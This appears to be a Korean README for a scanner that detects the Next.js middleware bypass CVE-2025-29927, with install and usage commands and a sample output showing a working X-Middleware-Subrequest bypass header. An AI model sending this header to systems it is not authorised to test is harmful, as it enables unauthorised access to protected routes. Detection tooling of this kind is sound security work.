
Next.js 미들웨어 우회 스캐너
CVE-2025-29927은 Next.js 버전 11.1.4부터 15.2.2에 영향을 미치는 Next.js 미들웨어 우회 취약점(CVE-2025-29927)을 탐지하는 특화된 보안 도구입니다. 이 치명적인 취약점은 공격자가 특수하게 조작된 HTTP 헤더를 전송하여 보안 제어를 우회할 수 있게 합니다.
Next.js 미들웨어 우회 취약점(CVE-2025-29927)은 공격자가 X-Middleware-Subrequest 악성 헤더를 전송하여 미들웨어 처리 로직을 혼란시킴으로써 인증/인가 제어를 우회할 수 있게 합니다. 이를 통해 보호된 리소스와 경로에 대한 무단 접근이 발생할 수 있습니다.
CVSS 점수: 9.1 (치명적)
# 저장소 복제
git clone https://github.com/gotr00t0day/CVE-2025-29927.git
cd CVE-2025-29927
# 요구 사항 설치
pip install -r requirements.txt
python CVE-2025-29927.py [-h] [-t TARGET] [-f FILE] [-c CONCURRENCY] [-k] [-s]
-t, --target: 스캔할 단일 대상 (예: example.com 또는 https://example.com)-f, --file: 대상 목록이 포함된 파일 (한 줄에 하나)-c, --concurrency: 동시 스캔 수 (기본값: 5)-k, --insecure: SSL 인증서 검증 비활성화 (IP 주소에 유용)-s, --silent: 무음 모드 - 취약한 대상만 표시단일 대상 스캔:
python CVE-2025-29927.py -t example.com
파일에서 여러 대상 스캔:
python CVE-2025-29927.py -f targets.txt
SSL 검증을 비활성화하고 스캔:
python CVE-2025-29927.py -t 192.168.1.1 -k
무음 모드로 자동화 스캔:
python CVE-2025-29927.py -f targets.txt -k -s
사용자 지정 헤더로 스캔:
python3 CVE-2025-29927.py -t target -k -s -H "middleware"
취약한 대상의 경우 MiddleWay는 다음을 표시합니다:
출력 예시:
[VULNERABLE] https://example.com - Endpoint /admin can be bypassed
Original status: 401
Bypassed status: 200
Bypass header: X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware
이 취약점을 완화하려면:
X-Middleware-Subrequest 헤더를 차단하세요이 도구는 보안 연구 및 방어 목적으로만 제공됩니다. 소유하지 않은 시스템을 스캔하기 전에 항상 적절한 승인을 받으십시오. 저자는 이 도구의 오용에 대해 책임을 지지 않습니다.
MIT